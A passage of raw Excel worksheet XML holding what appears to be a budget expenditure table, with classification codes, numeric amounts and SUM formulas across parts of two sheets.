    <row r="3" s="645" customFormat="1" ht="20.1" customHeight="1" spans="1:3">
      <c r="A3" s="660" t="s">
        <v>1978</v>
      </c>
      <c r="B3" s="661"/>
      <c r="C3" s="661"/>
    </row>
    <row r="4" s="646" customFormat="1" ht="27.95" customHeight="1" spans="1:16">
      <c r="A4" s="662" t="s">
        <v>952</v>
      </c>
      <c r="B4" s="662" t="s">
        <v>953</v>
      </c>
      <c r="C4" s="662" t="s">
        <v>1979</v>
      </c>
      <c r="D4" s="650"/>
      <c r="E4" s="650"/>
      <c r="F4" s="650"/>
      <c r="G4" s="650"/>
      <c r="H4" s="650"/>
      <c r="I4" s="650"/>
      <c r="J4" s="650"/>
      <c r="K4" s="650"/>
      <c r="L4" s="650"/>
      <c r="M4" s="650"/>
      <c r="N4" s="650"/>
      <c r="O4" s="650"/>
      <c r="P4" s="650"/>
    </row>
    <row r="5" s="647" customFormat="1" ht="20.1" customHeight="1" spans="1:3">
      <c r="A5" s="663" t="s">
        <v>1975</v>
      </c>
      <c r="B5" s="664"/>
      <c r="C5" s="269">
        <f>SUM(C6,C11,C22,C29,C35,C39,C42,C46,C49,C55,C57,C60,C61)</f>
        <v>418168</v>
      </c>
    </row>
    <row r="6" s="647" customFormat="1" ht="20.1" customHeight="1" spans="1:16">
      <c r="A6" s="665" t="s">
        <v>1980</v>
      </c>
      <c r="B6" s="666" t="s">
        <v>1981</v>
      </c>
      <c r="C6" s="667">
        <f>SUM(C7:C10)</f>
        <v>73275</v>
      </c>
      <c r="D6" s="668"/>
      <c r="E6" s="668"/>
      <c r="F6" s="668"/>
      <c r="G6" s="668"/>
      <c r="H6" s="668"/>
      <c r="I6" s="668"/>
      <c r="J6" s="668"/>
      <c r="K6" s="668"/>
      <c r="L6" s="668"/>
      <c r="M6" s="668"/>
      <c r="N6" s="668"/>
      <c r="O6" s="668"/>
      <c r="P6" s="668"/>
    </row>
    <row r="7" s="648" customFormat="1" ht="20.1" customHeight="1" spans="1:3">
      <c r="A7" s="669" t="s">
        <v>1982</v>
      </c>
      <c r="B7" s="670" t="s">
        <v>1983</v>
      </c>
      <c r="C7" s="671">
        <v>51030</v>
      </c>
    </row>
    <row r="8" s="648" customFormat="1" ht="20.1" customHeight="1" spans="1:3">
      <c r="A8" s="669" t="s">
        <v>1984</v>
      </c>
      <c r="B8" s="670" t="s">
        <v>1985</v>
      </c>
      <c r="C8" s="671">
        <v>11946</v>
      </c>
    </row>
    <row r="9" s="648" customFormat="1" ht="20.1" customHeight="1" spans="1:3">
      <c r="A9" s="669" t="s">
        <v>1986</v>
      </c>
      <c r="B9" s="670" t="s">
        <v>1987</v>
      </c>
      <c r="C9" s="671">
        <v>6495</v>
      </c>
    </row>
    <row r="10" s="648" customFormat="1" ht="20.1" customHeight="1" spans="1:3">
      <c r="A10" s="669" t="s">
        <v>1988</v>
      </c>
      <c r="B10" s="672" t="s">
        <v>1989</v>
      </c>
      <c r="C10" s="671">
        <v>3804</v>
      </c>
    </row>
    <row r="11" s="647" customFormat="1" ht="20.1" customHeight="1" spans="1:6">
      <c r="A11" s="673" t="s">
        <v>1990</v>
      </c>
      <c r="B11" s="674" t="s">
        <v>1991</v>
      </c>
      <c r="C11" s="675">
        <f>SUM(C12:C21)</f>
        <v>30035</v>
      </c>
      <c r="F11" s="648"/>
    </row>
    <row r="12" s="648" customFormat="1" ht="20.1" customHeight="1" spans="1:3">
      <c r="A12" s="669" t="s">
        <v>1992</v>
      </c>
      <c r="B12" s="672" t="s">
        <v>1993</v>
      </c>
      <c r="C12" s="671">
        <v>6031</v>
      </c>
    </row>
    <row r="13" s="648" customFormat="1" ht="20.1" customHeight="1" spans="1:3">
      <c r="A13" s="669" t="s">
        <v>1994</v>
      </c>
      <c r="B13" s="670" t="s">
        <v>1995</v>
      </c>
      <c r="C13" s="671">
        <v>28</v>
      </c>
    </row>
    <row r="14" s="648" customFormat="1" ht="20.1" customHeight="1" spans="1:3">
      <c r="A14" s="669" t="s">
        <v>1996</v>
      </c>
      <c r="B14" s="670" t="s">
        <v>1997</v>
      </c>
      <c r="C14" s="671">
        <v>70</v>
      </c>
    </row>
    <row r="15" s="648" customFormat="1" ht="20.1" customHeight="1" spans="1:3">
      <c r="A15" s="669" t="s">
        <v>1998</v>
      </c>
      <c r="B15" s="670" t="s">
        <v>1999</v>
      </c>
      <c r="C15" s="671">
        <v>46</v>
      </c>
    </row>
    <row r="16" s="648" customFormat="1" ht="20.1" customHeight="1" spans="1:3">
      <c r="A16" s="669" t="s">
        <v>2000</v>
      </c>
      <c r="B16" s="670" t="s">
        <v>2001</v>
      </c>
      <c r="C16" s="671">
        <v>5567</v>
      </c>
    </row>
    <row r="17" s="648" customFormat="1" ht="20.1" customHeight="1" spans="1:3">
      <c r="A17" s="669" t="s">
        <v>2002</v>
      </c>
      <c r="B17" s="670" t="s">
        <v>2003</v>
      </c>
      <c r="C17" s="671">
        <v>131</v>
      </c>
    </row>
    <row r="18" s="648" customFormat="1" ht="20.1" customHeight="1" spans="1:3">
      <c r="A18" s="669" t="s">
        <v>2004</v>
      </c>
      <c r="B18" s="670" t="s">
        <v>2005</v>
      </c>
      <c r="C18" s="671">
        <v>14</v>
      </c>
    </row>
    <row r="19" s="648" customFormat="1" ht="20.1" customHeight="1" spans="1:3">
      <c r="A19" s="669" t="s">
        <v>2006</v>
      </c>
      <c r="B19" s="670" t="s">
        <v>2007</v>
      </c>
      <c r="C19" s="671">
        <v>800</v>
      </c>
    </row>
    <row r="20" s="648" customFormat="1" ht="20.1" customHeight="1" spans="1:3">
      <c r="A20" s="669" t="s">
        <v>2008</v>
      </c>
      <c r="B20" s="670" t="s">
        <v>2009</v>
      </c>
      <c r="C20" s="671">
        <v>325</v>
      </c>
    </row>
    <row r="21" s="648" customFormat="1" ht="20.1" customHeight="1" spans="1:3">
      <c r="A21" s="669" t="s">
        <v>2010</v>
      </c>
      <c r="B21" s="670" t="s">
        <v>2011</v>
      </c>
      <c r="C21" s="671">
        <v>17023</v>
      </c>
    </row>
    <row r="22" s="647" customFormat="1" ht="20.1" customHeight="1" spans="1:6">
      <c r="A22" s="673" t="s">
        <v>2012</v>
      </c>
      <c r="B22" s="674" t="s">
        <v>2013</v>
      </c>
      <c r="C22" s="675">
        <f>SUM(C23:C28)</f>
        <v>16312</v>
      </c>
      <c r="F22" s="648"/>
    </row>
    <row r="23" s="648" customFormat="1" ht="20.1" customHeight="1" spans="1:3">
      <c r="A23" s="669" t="s">
        <v>2014</v>
      </c>
      <c r="B23" s="670" t="s">
        <v>2015</v>
      </c>
      <c r="C23" s="671">
        <v>1021</v>
      </c>
    </row>
    <row r="24" s="648" customFormat="1" ht="20.1" customHeight="1" spans="1:3">
      <c r="A24" s="669" t="s">
        <v>2016</v>
      </c>
      <c r="B24" s="670" t="s">
        <v>2017</v>
      </c>
      <c r="C24" s="671">
        <v>11453</v>
      </c>
    </row>
    <row r="25" s="647" customFormat="1" ht="20.1" customHeight="1" spans="1:6">
      <c r="A25" s="669" t="s">
        <v>2018</v>
      </c>
      <c r="B25" s="670" t="s">
        <v>2019</v>
      </c>
      <c r="C25" s="671">
        <v>0</v>
      </c>
      <c r="F25" s="648"/>
    </row>
    <row r="26" s="648" customFormat="1" ht="20.1" customHeight="1" spans="1:3">
      <c r="A26" s="669" t="s">
        <v>2020</v>
      </c>
      <c r="B26" s="670" t="s">
        <v>2021</v>
      </c>
      <c r="C26" s="671">
        <v>46</v>
      </c>
    </row>
    <row r="27" s="648" customFormat="1" ht="20.1" customHeight="1" spans="1:3">
      <c r="A27" s="669" t="s">
        <v>2022</v>
      </c>
      <c r="B27" s="670" t="s">
        <v>2023</v>
      </c>
      <c r="C27" s="671">
        <v>186</v>
      </c>
    </row>
    <row r="28" s="647" customFormat="1" ht="20.1" customHeight="1" spans="1:6">
      <c r="A28" s="669" t="s">
        <v>2024</v>
      </c>
      <c r="B28" s="670" t="s">
        <v>2025</v>
      </c>
      <c r="C28" s="671">
        <v>3606</v>
      </c>
      <c r="F28" s="648"/>
    </row>
    <row r="29" s="647" customFormat="1" ht="20.1" customHeight="1" spans="1:6">
      <c r="A29" s="673" t="s">
        <v>2026</v>
      </c>
      <c r="B29" s="674" t="s">
        <v>2027</v>
      </c>
      <c r="C29" s="675">
        <f>SUM(C30:C34)</f>
        <v>5100</v>
      </c>
      <c r="F29" s="648"/>
    </row>
    <row r="30" s="647" customFormat="1" ht="20.1" customHeight="1" spans="1:6">
      <c r="A30" s="669" t="s">
        <v>2028</v>
      </c>
      <c r="B30" s="670" t="s">
        <v>2015</v>
      </c>
      <c r="C30" s="671">
        <v>0</v>
      </c>
      <c r="F30" s="648"/>
    </row>
    <row r="31" s="648" customFormat="1" ht="20.1" customHeight="1" spans="1:3">
      <c r="A31" s="669" t="s">
        <v>2029</v>
      </c>
      <c r="B31" s="670" t="s">
        <v>2017</v>
      </c>
      <c r="C31" s="671">
        <v>5100</v>
      </c>
    </row>
    <row r="32" s="648" customFormat="1" ht="20.1" customHeight="1" spans="1:3">
      <c r="A32" s="669" t="s">
        <v>2030</v>
      </c>
      <c r="B32" s="670" t="s">
        <v>2019</v>
      </c>
      <c r="C32" s="671">
        <v>0</v>
      </c>
    </row>
    <row r="33" s="649" customFormat="1" ht="20.1" customHeight="1" spans="1:6">
      <c r="A33" s="676" t="s">
        <v>2031</v>
      </c>
      <c r="B33" s="677" t="s">
        <v>2021</v>
      </c>
      <c r="C33" s="678">
        <v>0</v>
      </c>
      <c r="F33" s="648"/>
    </row>
    <row r="34" s="650" customFormat="1" ht="20.1" customHeight="1" spans="1:6">
      <c r="A34" s="679">
        <v>50499</v>
      </c>
      <c r="B34" s="680" t="s">
        <v>2025</v>
      </c>
      <c r="C34" s="681">
        <v>0</v>
      </c>
      <c r="F34" s="648"/>
    </row>
    <row r="35" s="650" customFormat="1" ht="20.1" customHeight="1" spans="1:6">
      <c r="A35" s="673">
        <v>505</v>
      </c>
      <c r="B35" s="674" t="s">
        <v>2032</v>
      </c>
      <c r="C35" s="278">
        <f>SUM(C36:C38)</f>
        <v>119392</v>
      </c>
      <c r="F35" s="648"/>
    </row>
    <row r="36" s="650" customFormat="1" ht="20.1" customHeight="1" spans="1:6">
      <c r="A36" s="669">
        <v>50501</v>
      </c>
      <c r="B36" s="672" t="s">
        <v>2033</v>
      </c>
      <c r="C36" s="276">
        <v>111992</v>
      </c>
      <c r="F36" s="648"/>
    </row>
    <row r="37" s="650" customFormat="1" ht="20.1" customHeight="1" spans="1:6">
      <c r="A37" s="669">
        <v>50502</v>
      </c>
      <c r="B37" s="670" t="s">
        <v>2034</v>
      </c>
      <c r="C37" s="276">
        <v>7400</v>
      </c>
      <c r="F37" s="648"/>
    </row>
    <row r="38" s="650" customFormat="1" ht="20.1" customHeight="1" spans="1:6">
      <c r="A38" s="669">
        <v>50599</v>
      </c>
      <c r="B38" s="670" t="s">
        <v>2035</v>
      </c>
      <c r="C38" s="276">
        <v>0</v>
      </c>
      <c r="F38" s="648"/>
    </row>
    <row r="39" s="650" customFormat="1" ht="20.1" customHeight="1" spans="1:6">
      <c r="A39" s="673">
        <v>506</v>
      </c>
      <c r="B39" s="674" t="s">
        <v>2036</v>
      </c>
      <c r="C39" s="278">
        <f>SUM(C40:C41)</f>
        <v>1285</v>
      </c>
      <c r="F39" s="648"/>
    </row>
    <row r="40" s="650" customFormat="1" ht="20.1" customHeight="1" spans="1:6">
      <c r="A40" s="669">
        <v>50601</v>
      </c>
      <c r="B40" s="672" t="s">
        <v>2037</v>
      </c>
      <c r="C40" s="276">
        <v>200</v>
      </c>
      <c r="F40" s="648"/>
    </row>
    <row r="41" s="650" customFormat="1" ht="20.1" customHeight="1" spans="1:6">
      <c r="A41" s="669">
        <v>50602</v>
      </c>
      <c r="B41" s="670" t="s">
        <v>2038</v>
      </c>
      <c r="C41" s="276">
        <v>1085</v>
      </c>
      <c r="F41" s="648"/>
    </row>
    <row r="42" s="650" customFormat="1" ht="20.1" customHeight="1" spans="1:6">
      <c r="A42" s="673" t="s">
        <v>2039</v>
      </c>
      <c r="B42" s="682" t="s">
        <v>2040</v>
      </c>
      <c r="C42" s="278">
        <f>SUM(C43:C45)</f>
        <v>14420</v>
      </c>
      <c r="F42" s="648"/>
    </row>
    <row r="43" s="650" customFormat="1" ht="20.1" customHeight="1" spans="1:6">
      <c r="A43" s="669">
        <v>50701</v>
      </c>
      <c r="B43" s="672" t="s">
        <v>2041</v>
      </c>
      <c r="C43" s="276">
        <v>1299</v>
      </c>
      <c r="F43" s="648"/>
    </row>
    <row r="44" s="650" customFormat="1" ht="20.1" customHeight="1" spans="1:6">
      <c r="A44" s="669">
        <v>50702</v>
      </c>
      <c r="B44" s="672" t="s">
        <v>2042</v>
      </c>
      <c r="C44" s="276">
        <v>70</v>
      </c>
      <c r="F44" s="648"/>
    </row>
    <row r="45" s="650" customFormat="1" ht="20.1" customHeight="1" spans="1:6">
      <c r="A45" s="669">
        <v>50799</v>
      </c>
      <c r="B45" s="670" t="s">
        <v>2043</v>
      </c>
      <c r="C45" s="276">
        <v>13051</v>
      </c>
      <c r="F45" s="648"/>
    </row>
    <row r="46" s="650" customFormat="1" ht="20.1" customHeight="1" spans="1:6">
      <c r="A46" s="673" t="s">
        <v>2044</v>
      </c>
      <c r="B46" s="682" t="s">
        <v>2045</v>
      </c>
      <c r="C46" s="278">
        <f>SUM(C47:C48)</f>
        <v>4230</v>
      </c>
      <c r="F46" s="648"/>
    </row>
    <row r="47" s="650" customFormat="1" ht="20.1" customHeight="1" spans="1:6">
      <c r="A47" s="669">
        <v>50803</v>
      </c>
      <c r="B47" s="670" t="s">
        <v>2046</v>
      </c>
      <c r="C47" s="276">
        <v>4230</v>
      </c>
      <c r="F47" s="648"/>
    </row>
    <row r="48" s="650" customFormat="1" ht="20.1" customHeight="1" spans="1:6">
      <c r="A48" s="669">
        <v>50804</v>
      </c>
      <c r="B48" s="672" t="s">
        <v>2047</v>
      </c>
      <c r="C48" s="276">
        <v>0</v>
      </c>
      <c r="F48" s="648"/>
    </row>
    <row r="49" s="650" customFormat="1" ht="20.1" customHeight="1" spans="1:6">
      <c r="A49" s="683" t="s">
        <v>2048</v>
      </c>
      <c r="B49" s="682" t="s">
        <v>2049</v>
      </c>
      <c r="C49" s="684">
        <f>SUM(C50:C54)</f>
        <v>117568</v>
      </c>
      <c r="F49" s="648"/>
    </row>
    <row r="50" s="650" customFormat="1" ht="20.1" customHeight="1" spans="1:6">
      <c r="A50" s="669">
        <v>50901</v>
      </c>
      <c r="B50" s="670" t="s">
        <v>2050</v>
      </c>
      <c r="C50" s="685">
        <v>41752</v>
      </c>
      <c r="F50" s="648"/>
    </row>
    <row r="51" s="650" customFormat="1" ht="20.1" customHeight="1" spans="1:6">
      <c r="A51" s="669">
        <v>50902</v>
      </c>
      <c r="B51" s="672" t="s">
        <v>2051</v>
      </c>
      <c r="C51" s="685">
        <v>1438</v>
      </c>
      <c r="F51" s="648"/>
    </row>
    <row r="52" s="650" customFormat="1" ht="20.1" customHeight="1" spans="1:6">
      <c r="A52" s="669">
        <v>50903</v>
      </c>
      <c r="B52" s="670" t="s">
        <v>2052</v>
      </c>
      <c r="C52" s="685">
        <v>4314</v>
      </c>
      <c r="F52" s="648"/>
    </row>
    <row r="53" s="650" customFormat="1" ht="20.1" customHeight="1" spans="1:6">
      <c r="A53" s="669">
        <v>50905</v>
      </c>
      <c r="B53" s="686" t="s">
        <v>2053</v>
      </c>
      <c r="C53" s="685">
        <v>9160</v>
      </c>
      <c r="F53" s="648"/>
    </row>
    <row r="54" s="650" customFormat="1" ht="20.1" customHeight="1" spans="1:6">
      <c r="A54" s="669">
        <v>50999</v>
      </c>
      <c r="B54" s="670" t="s">
        <v>2054</v>
      </c>
      <c r="C54" s="685">
        <v>60904</v>
      </c>
      <c r="F54" s="648"/>
    </row>
    <row r="55" s="650" customFormat="1" ht="20.1" customHeight="1" spans="1:6">
      <c r="A55" s="673" t="s">
        <v>2055</v>
      </c>
      <c r="B55" s="682" t="s">
        <v>2056</v>
      </c>
      <c r="C55" s="684">
        <f>SUM(C56)</f>
        <v>0</v>
      </c>
      <c r="F55" s="648"/>
    </row>
    <row r="56" s="650" customFormat="1" ht="20.1" customHeight="1" spans="1:6">
      <c r="A56" s="669">
        <v>51002</v>
      </c>
      <c r="B56" s="670" t="s">
        <v>2057</v>
      </c>
      <c r="C56" s="685">
        <v>0</v>
      </c>
      <c r="F56" s="648"/>
    </row>
    <row r="57" s="650" customFormat="1" ht="20.1" customHeight="1" spans="1:6">
      <c r="A57" s="673" t="s">
        <v>2058</v>
      </c>
      <c r="B57" s="674" t="s">
        <v>2059</v>
      </c>
      <c r="C57" s="684">
        <f>SUM(C58:C59)</f>
        <v>4452</v>
      </c>
      <c r="F57" s="648"/>
    </row>
    <row r="58" s="650" customFormat="1" ht="20.1" customHeight="1" spans="1:6">
      <c r="A58" s="669">
        <v>51101</v>
      </c>
      <c r="B58" s="670" t="s">
        <v>2060</v>
      </c>
      <c r="C58" s="685">
        <v>4452</v>
      </c>
      <c r="F58" s="648"/>
    </row>
    <row r="59" s="650" customFormat="1" ht="20.1" customHeight="1" spans="1:6">
      <c r="A59" s="669">
        <v>51103</v>
      </c>
      <c r="B59" s="672" t="s">
        <v>2061</v>
      </c>
      <c r="C59" s="685">
        <v>0</v>
      </c>
      <c r="F59" s="648"/>
    </row>
    <row r="60" s="650" customFormat="1" ht="20.1" customHeight="1" spans="1:6">
      <c r="A60" s="673" t="s">
        <v>2062</v>
      </c>
      <c r="B60" s="687" t="s">
        <v>2063</v>
      </c>
      <c r="C60" s="684">
        <v>4510</v>
      </c>
      <c r="F60" s="648"/>
    </row>
    <row r="61" s="650" customFormat="1" ht="20.1" customHeight="1" spans="1:6">
      <c r="A61" s="688">
        <v>599</v>
      </c>
      <c r="B61" s="689" t="s">
        <v>2064</v>
      </c>
      <c r="C61" s="690">
        <v>27589</v>
      </c>
      <c r="F61" s="648"/>
    </row>
    <row r="62" s="650" customFormat="1" spans="1:3">
      <c r="A62" s="651"/>
      <c r="C62" s="691"/>
    </row>
    <row r="63" s="650" customFormat="1" spans="1:3">
      <c r="A63" s="651"/>
      <c r="C63" s="691"/>
    </row>
    <row r="64" s="650" customFormat="1" spans="1:3">
      <c r="A64" s="651"/>
      <c r="C64" s="691"/>
    </row>
    <row r="65" s="650" customFormat="1" spans="1:3">
      <c r="A65" s="651"/>
      <c r="C65" s="691"/>
    </row>
    <row r="66" s="650" customFormat="1" spans="1:3">
      <c r="A66" s="651"/>
      <c r="C66" s="691"/>
    </row>
    <row r="67" s="650" customFormat="1" spans="1:3">
      <c r="A67" s="651"/>
      <c r="C67" s="691"/>
    </row>
    <row r="68" s="650" customFormat="1" spans="1:3">
      <c r="A68" s="651"/>
      <c r="C68" s="691"/>
    </row>
    <row r="69" s="650" customFormat="1" spans="1:3">
      <c r="A69" s="651"/>
      <c r="C69" s="691"/>
    </row>
    <row r="70" s="650" customFormat="1" spans="1:3">
      <c r="A70" s="651"/>
      <c r="C70" s="691"/>
    </row>
    <row r="71" s="650" customFormat="1" spans="1:3">
      <c r="A71" s="651"/>
      <c r="C71" s="691"/>
    </row>
    <row r="72" s="650" customFormat="1" spans="1:3">
      <c r="A72" s="651"/>
      <c r="C72" s="691"/>
    </row>
    <row r="73" s="650" customFormat="1" spans="1:3">
      <c r="A73" s="651"/>
      <c r="C73" s="691"/>
    </row>
    <row r="74" s="650" customFormat="1" spans="1:3">
      <c r="A74" s="651"/>
      <c r="C74" s="691"/>
    </row>
    <row r="75" s="650" customFormat="1" spans="1:3">
      <c r="A75" s="651"/>
      <c r="C75" s="691"/>
    </row>
    <row r="76" s="650" customFormat="1" spans="1:3">
      <c r="A76" s="651"/>
      <c r="C76" s="691"/>
    </row>
    <row r="77" s="650" customFormat="1" spans="1:3">
      <c r="A77" s="651"/>
      <c r="C77" s="691"/>
    </row>
    <row r="78" s="650" customFormat="1" spans="1:3">
      <c r="A78" s="651"/>
      <c r="C78" s="691"/>
    </row>
    <row r="79" s="650" customFormat="1" spans="1:3">
      <c r="A79" s="651"/>
      <c r="C79" s="691"/>
    </row>
    <row r="80" s="650" customFormat="1" spans="1:3">
      <c r="A80" s="651"/>
      <c r="C80" s="691"/>
    </row>
    <row r="81" s="650" customFormat="1" spans="1:3">
      <c r="A81" s="651"/>
      <c r="C81" s="691"/>
    </row>
    <row r="82" s="650" customFormat="1" spans="1:3">
      <c r="A82" s="651"/>
      <c r="C82" s="691"/>
    </row>
    <row r="83" s="650" customFormat="1" spans="1:3">
      <c r="A83" s="651"/>
      <c r="C83" s="691"/>
    </row>
    <row r="84" s="650" customFormat="1" spans="1:3">
      <c r="A84" s="651"/>
      <c r="C84" s="691"/>
    </row>
    <row r="85" s="650" customFormat="1" spans="1:3">
      <c r="A85" s="651"/>
      <c r="C85" s="691"/>
    </row>
    <row r="86" s="650" customFormat="1" spans="1:3">
      <c r="A86" s="651"/>
      <c r="C86" s="691"/>
    </row>
    <row r="87" s="650" customFormat="1" spans="1:3">
      <c r="A87" s="651"/>
      <c r="C87" s="691"/>
    </row>
    <row r="88" s="650" customFormat="1" spans="1:3">
      <c r="A88" s="651"/>
      <c r="C88" s="691"/>
    </row>
    <row r="89" s="650" customFormat="1" spans="1:3">
      <c r="A89" s="651"/>
      <c r="C89" s="691"/>
    </row>
    <row r="90" s="650" customFormat="1" spans="1:3">
      <c r="A90" s="651"/>
      <c r="C90" s="691"/>
    </row>
    <row r="91" s="650" customFormat="1" spans="1:3">
      <c r="A91" s="651"/>
      <c r="C91" s="691"/>
    </row>
    <row r="92" s="650" customFormat="1" spans="1:3">
      <c r="A92" s="651"/>
      <c r="C92" s="691"/>
    </row>
    <row r="93" s="650" customFormat="1" spans="1:3">
      <c r="A93" s="651"/>
      <c r="C93" s="691"/>
    </row>
    <row r="94" s="650" customFormat="1" spans="1:3">
      <c r="A94" s="651"/>
      <c r="C94" s="691"/>
    </row>
    <row r="95" s="650" customFormat="1" spans="1:3">
      <c r="A95" s="651"/>
      <c r="C95" s="691"/>
    </row>
    <row r="96" s="650" customFormat="1" spans="1:3">
      <c r="A96" s="651"/>
      <c r="C96" s="691"/>
    </row>
    <row r="97" s="650" customFormat="1" spans="1:3">
      <c r="A97" s="651"/>
      <c r="C97" s="691"/>
    </row>
    <row r="98" s="650" customFormat="1" spans="1:3">
      <c r="A98" s="651"/>
      <c r="C98" s="691"/>
    </row>
  </sheetData>
  <mergeCells count="3">
    <mergeCell ref="A2:C2"/>
    <mergeCell ref="A3:C3"/>
    <mergeCell ref="A5:B5"/>
  </mergeCells>
  <pageMargins left="0.751388888888889" right="0.751388888888889" top="1" bottom="1" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" orientation="portrait"/>
  <headerFooter/>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599993896298105"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:C36"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="2" ySplit="6" topLeftCell="C22" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="J10" sqref="J10"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.84259259259259" defaultRowHeight="13.2" outlineLevelCol="2"/>
  <cols>
    <col min="1" max="1" width="8.84259259259259" style="624"/>
    <col min="2" max="2" width="48.4259259259259" style="624" customWidth="1"/>
    <col min="3" max="3" width="24.2777777777778" style="624" customWidth="1"/>
    <col min="4" max="16384" width="8.84259259259259" style="624"/>
  </cols>
  <sheetData>
    <row r="1" ht="18.95" customHeight="1" spans="1:3">
      <c r="A1" s="606" t="s">
        <v>2065</v>
      </c>
      <c r="B1" s="606"/>
      <c r="C1" s="625"/>
    </row>
    <row r="2" ht="50.1" customHeight="1" spans="1:3">
      <c r="A2" s="398" t="s">
        <v>2066</v>
      </c>
      <c r="B2" s="398"/>
      <c r="C2" s="626"/>
    </row>
    <row r="3" ht="18.95" customHeight="1" spans="1:3">
      <c r="A3" s="627"/>
      <c r="B3" s="627"/>
      <c r="C3" s="628" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="4" ht="27" customHeight="1" spans="1:3">
      <c r="A4" s="629" t="s">
        <v>2067</v>
      </c>
      <c r="B4" s="629"/>
      <c r="C4" s="630" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5" ht="20.1" customHeight="1" spans="1:3">
      <c r="A5" s="631" t="s">
        <v>2068</v>
      </c>
      <c r="B5" s="631"/>
      <c r="C5" s="632">
        <f>C6+C13</f>
        <v>172077</v>
      </c>
    </row>
    <row r="6" ht="21.95" customHeight="1" spans="1:3">
      <c r="A6" s="633" t="s">
        <v>2069</v>
      </c>
      <c r="B6" s="633"/>
      <c r="C6" s="634">
        <f>SUM(C7:C12)</f>
        <v>12077</v>
      </c>
    </row>
    <row r="7" ht="21.95" customHeight="1" spans="1:3">
      <c r="A7" s="635" t="s">
        <v>2070</v>
      </c>
      <c r="B7" s="635"/>
      <c r="C7" s="636">
        <v>4137</v>
      </c>
    </row>
    <row r="8" ht="21.95" customHeight="1" spans="1:3">
      <c r="A8" s="637" t="s">
        <v>2071</v>
      </c>
      <c r="B8" s="637"/>
      <c r="C8" s="636">
        <v>440</v>
      </c>
    </row>
    <row r="9" ht="21.95" customHeight="1" spans="1:3">
      <c r="A9" s="635" t="s">
        <v>2072</v>
      </c>
      <c r="B9" s="635"/>
      <c r="C9" s="636">
        <v>3644</v>
      </c>
    </row>
    <row r="10" ht="21.95" customHeight="1" spans="1:3">
      <c r="A10" s="635" t="s">
        <v>2073</v>
      </c>
      <c r="B10" s="635"/>
      <c r="C10" s="636">
        <v>3666</v>
      </c>
    </row>
    <row r="11" ht="21.95" customHeight="1" spans="1:3">
      <c r="A11" s="635" t="s">
        <v>2074</v>
      </c>
      <c r="B11" s="635"/>
      <c r="C11" s="638">
        <v>-142</v>
      </c>
    </row>
    <row r="12" ht="21.95" customHeight="1" spans="1:3">
      <c r="A12" s="635" t="s">
        <v>2075</v>
      </c>
      <c r="B12" s="635"/>
      <c r="C12" s="636">
        <v>332</v>
      </c>
    </row>
    <row r="13" ht="21.95" customHeight="1" spans="1:3">
      <c r="A13" s="639" t="s">
        <v>2076</v>
      </c>
      <c r="B13" s="639"/>
      <c r="C13" s="634">
        <f>SUM(C14:C36)</f>
        <v>160000</v>
      </c>
    </row>
    <row r="14" ht="21.95" customHeight="1" spans="1:3">
      <c r="A14" s="635" t="s">
        <v>2077</v>
      </c>
      <c r="B14" s="635"/>
      <c r="C14" s="636"/>
    </row>
    <row r="15" ht="21.95" customHeight="1" spans="1:3">
      <c r="A15" s="635" t="s">
        <v>2078</v>
      </c>
      <c r="B15" s="635"/>
      <c r="C15" s="636">
        <v>18294</v>
      </c>
    </row>
    <row r="16" ht="21.95" customHeight="1" spans="1:3">
      <c r="A16" s="635" t="s">
        <v>2079</v>
      </c>
      <c r="B16" s="635"/>
      <c r="C16" s="636">
        <v>15064</v>
      </c>
    </row>
    <row r="17" ht="21.95" customHeight="1" spans="1:3">
      <c r="A17" s="635" t="s">
        <v>2080</v>
      </c>
      <c r="B17" s="635"/>
      <c r="C17" s="636">
        <v>8588</v>
      </c>
    </row>
    <row r="18" ht="21.95" customHeight="1" spans="1:3">
      <c r="A18" s="635" t="s">
        <v>2081</v>
      </c>
      <c r="B18" s="635"/>
      <c r="C18" s="636">
        <v>264</v>
      </c>
    </row>
    <row r="19" ht="21.95" customHeight="1" spans="1:3">
      <c r="A19" s="635" t="s">
        <v>2082</v>
      </c>
      <c r="B19" s="635"/>
      <c r="C19" s="636">
        <v>92</v>
      </c>
    </row>
    <row r="20" ht="21.95" customHeight="1" spans="1:3">
      <c r="A20" s="635" t="s">
        <v>2083</v>
      </c>
      <c r="B20" s="635"/>
      <c r="C20" s="636">
        <v>4919</v>
      </c>
    </row>
    <row r="21" ht="21.95" customHeight="1" spans="1:3">
      <c r="A21" s="635" t="s">
        <v>2084</v>
      </c>
      <c r="B21" s="635"/>
      <c r="C21" s="636">
        <v>8889</v>
      </c>
    </row>
    <row r="22" ht="21.95" customHeight="1" spans="1:3">
      <c r="A22" s="635" t="s">
        <v>2085</v>
      </c>
      <c r="B22" s="635"/>
      <c r="C22" s="636">
        <v>3961</v>
      </c>
    </row>
    <row r="23" ht="21.95" customHeight="1" spans="1:3">
      <c r="A23" s="635" t="s">
        <v>2086</v>
      </c>
      <c r="B23" s="635"/>
      <c r="C23" s="636">
        <v>9006</v>
      </c>
    </row>
    <row r="24" ht="21.95" customHeight="1" spans="1:3">
      <c r="A24" s="635" t="s">
        <v>2087</v>
      </c>
      <c r="B24" s="635"/>
      <c r="C24" s="636">
        <v>799</v>
      </c>
    </row>
    <row r="25" ht="21.95" customHeight="1" spans="1:3">
      <c r="A25" s="635" t="s">
        <v>2088</v>
      </c>
      <c r="B25" s="635"/>
      <c r="C25" s="636">
        <v>6055</v>
      </c>
    </row>
    <row r="26" ht="21.95" customHeight="1" spans="1:3">
      <c r="A26" s="635" t="s">
        <v>2089</v>
      </c>
      <c r="B26" s="635"/>
      <c r="C26" s="636">
        <v>20</v>
      </c>
    </row>
    <row r="27" ht="21.95" customHeight="1" spans="1:3">
      <c r="A27" s="635" t="s">
        <v>2090</v>
      </c>
      <c r="B27" s="635"/>
      <c r="C27" s="636">
        <v>545</v>
      </c>
    </row>
    <row r="28" ht="21.95" customHeight="1" spans="1:3">
      <c r="A28" s="635" t="s">
        <v>2091</v>
      </c>
      <c r="B28" s="635"/>
      <c r="C28" s="636">
        <v>46000</v>
      </c>
    </row>
